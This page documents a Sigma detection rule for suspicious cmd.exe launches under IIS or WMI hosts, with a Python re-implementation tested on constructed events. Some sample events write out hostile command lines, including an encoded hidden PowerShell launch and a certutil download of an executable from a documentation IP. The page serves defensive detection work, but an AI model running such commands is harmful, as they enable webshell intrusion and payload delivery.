Command Shell Unusual or Suspicious Process Ancestry
Looks for suspicious process interactions between the Windows IIS worker process (w3wp.exe) or the WMI Provider Host (wmiprvse.exe) and the command shell: cmd.exe spawned by either parent with a command line that contains a URL (http:// or https://), the string echo, or a /c invocation of powershell.exe. Inspired by the 2022 Red Canary Threat Detection report.
Sigma rule
```yaml
title: Command Shell Unusual or Suspicious Process Ancestry
id: 157c153a-97d1-43e4-bc25-5461f52c935d
status: experimental
description: Looks for suspicious process interactions between the Windows IIS worker
    process (w3wp.exe) and the command shell. Inspired by the 2022 Red Canary Threat
    Detection report.
references:
    - https://redcanary.com/threat-detection-report/techniques/windows-command-shell/
author: Micah Babinski
date: 2022/11/03
tags:
    - attack.persistence
    - attack.t1505
    - attack.execution
    - attack.t1059.003
logsource:
    category: process_creation
    product: windows
detection:
    selection_process:
        Image|endswith: '\cmd.exe'
        ParentImage|endswith:
            - '\w3wp.exe'
            - '\wmiprvse.exe'
    selection_cmdline:
        - CommandLine|contains:
            - 'http://'
            - 'https://'
            - 'echo'
        - CommandLine|contains|all:
            - '/c'
            - 'powershell.exe'
    condition: selection_process and selection_cmdline
falsepositives:
    - Unknown
level: high
```
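The detection block above reads as: `selection_process` requires the child to be cmd.exe and the parent to be w3wp.exe or wmiprvse.exe; `selection_cmdline` is a YAML list, so its two items are OR'ed (any of the URL/echo substrings, or both `/c` and `powershell.exe`); the condition ANDs the two selections. The following is an added example, not Sigma's matching engine, a SigmaHQ backend, or code from the rule author: it re-implements that logic in plain Python and runs it over constructed process_creation events (not real telemetry) using Sysmon-style field names `Image`, `ParentImage` and `CommandLine`. Sigma string modifiers compare case-insensitively, so every comparison lowercases both sides.

```python
# Added example: plain-Python re-implementation of the rule's detection logic.
# Not Sigma's engine or a SigmaHQ backend; field names follow the Sigma/Sysmon
# process_creation schema. All string matching is case-insensitive, as in Sigma.

# Constructed sample events (not real telemetry); "label" exists only for readability.
SAMPLE_EVENTS = [
    {"label": "webshell-to-powershell",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"label": "wmi-echo-redirect",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo whoami > C:\Windows\Temp\o.txt"},
    {"label": "iis-certutil-download",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r"cmd.exe /c certutil -urlcache -split -f http://198.51.100.7/a.exe a.exe"},
    {"label": "iis-benign-dir",          # right ancestry, no command-line indicator
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir C:\inetpub\wwwroot"},
    {"label": "explorer-powershell",     # indicator present, parent not in the list
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c powershell.exe Get-Process"},
    {"label": "iis-conhost",             # parent matches, child is not cmd.exe
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\conhost.exe",
     "CommandLine": r"\??\C:\Windows\system32\conhost.exe 0x4"},
]


def _endswith_any(value, suffixes):
    """Sigma |endswith against a list: true if the lowercased value ends with any suffix."""
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)


def selection_process(event):
    """Image|endswith '\\cmd.exe' AND ParentImage|endswith one of the listed parents."""
    return (_endswith_any(event.get("Image", ""), ["\\cmd.exe"])
            and _endswith_any(event.get("ParentImage", ""), ["\\w3wp.exe", "\\wmiprvse.exe"]))


def selection_cmdline(event):
    """The two list items under selection_cmdline are OR'ed:
    contains ANY of {http://, https://, echo}  OR  contains ALL of {/c, powershell.exe}."""
    cl = event.get("CommandLine", "").lower()
    any_url_or_echo = any(s in cl for s in ("http://", "https://", "echo"))
    shell_to_powershell = all(s in cl for s in ("/c", "powershell.exe"))
    return any_url_or_echo or shell_to_powershell


def rule_matches(event):
    """condition: selection_process and selection_cmdline"""
    return selection_process(event) and selection_cmdline(event)


def matching_labels(events):
    """Labels of the events the rule would alert on, in input order."""
    return [e["label"] for e in events if rule_matches(e)]


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(f"{'ALERT ' if rule_matches(e) else 'ignore'}  {e['label']}")
```

Running the script alerts on the first three events and ignores the rest, which is the intended shape: ancestry alone (`iis-benign-dir`, `iis-conhost`) is not enough, and a suspicious command line under a normal parent (`explorer-powershell`) is out of scope for this rule. Note how broad the `echo` substring is: it fires on any cmd.exe command line containing those four letters, including benign redirection into files, and the rule lists its false positives as Unknown. Baseline what spawns cmd.exe under w3wp.exe and wmiprvse.exe in your own environment before routing this level-high rule to an alerting queue.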
References
- https://redcanary.com/threat-detection-report/techniques/windows-command-shell/
Related rules
- Command Shell Bypassing Security Controls
- Command Shell Obfuscated Commands
- Powershell Obfuscation and Escape Characters
- Windows Scheduled Task Behaving Improperly or Suspiciously
- Windows Scheduled Task Create Shell